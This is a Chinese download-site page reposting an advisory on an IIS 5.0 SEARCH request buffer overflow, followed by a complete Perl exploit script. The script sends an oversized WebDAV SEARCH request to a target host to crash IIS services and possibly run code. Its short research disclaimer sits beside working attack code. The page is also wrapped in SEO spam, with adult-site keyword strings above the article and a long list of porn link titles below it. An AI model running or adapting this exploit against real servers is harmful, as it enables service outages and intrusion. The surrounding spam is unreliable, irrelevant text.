日本国产亚洲-日本国产一区-日本国产一区二区三区-日本韩国欧美一区-日本韩国欧美在线-日本韩国欧美在线观看

當前位置:雨林木風下載站 > 技術開發教程 > 詳細頁面

IIS 處理 SEARCH 請求漏洞

IIS 處理 SEARCH 請求漏洞

更新時間:2022-05-13 文章作者:未知 信息來源:網絡 閱讀次數:

涉及程序:
IIS
  
描述:
通過構造特殊的 SEARCH 請求導致 IIS 執行攻擊者代碼漏洞
  
詳細:
發現 IIS 在處理 SEARCH 請求時存在漏洞,攻擊者通過提交構造特殊的 IIS SEARCH 請求能重啟與 IIS 相關的所有服務,而且可能遠程執行任意代碼。

以下代碼僅僅用來測試和研究這個漏洞,如果您將其用于不正當的途徑請后果自負



Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE
("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

受影響系統:
IIS 5.0  

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

主站蜘蛛池模板: 77久久| 欧洲高清| 天天舔天天插 | 在线精品日韩一区二区三区 | 久草最新网址 | 最新国产 | 在线 日韩| 国产97色在线 | 亚洲 | 亚洲 欧洲 自拍 另类 校园 | 欧美人妖与人妖做爰网站 | 色老大综合久久综合热 | 台湾三级香港三级经典三在线 | 国产综合91天堂亚洲国产 | 久久99久久99小草精品免视看 | 欧美中文综合在线视频 | 国产v在线播放 | 国产91在线 | 亚洲 | 日韩亚洲精品不卡在线 | 中文字幕天天躁日日躁狠狠躁97 | 亚洲精品主播一区二区三区 | 日本高清色视频www 日本高清视频www | 亚洲日本中文字幕天天更新 | 国产亚洲精品久久久久久无 | 色婷婷久久综合中文久久蜜桃 | 亚洲精品久久99久久一 | 中文学幕专区 | 手机在线看片 | 欧美日韩1区2区 | 碰免费人人人视频 | 欧美一级淫片a免费播放口aaa | 丁香婷婷啪啪 | 夜夜爱夜夜做夜夜爽 | 久久国产亚洲欧美日韩精品 | 2019精品专区 | 日韩成人免费在线视频 | 免费大片看黄在观看 | 婷婷免费在线 | 久久精品国产福利国产琪琪 | 97色伦图片97综合影院久久 | 午夜深夜福利网址 | 国产成人综合亚洲欧洲色就色 |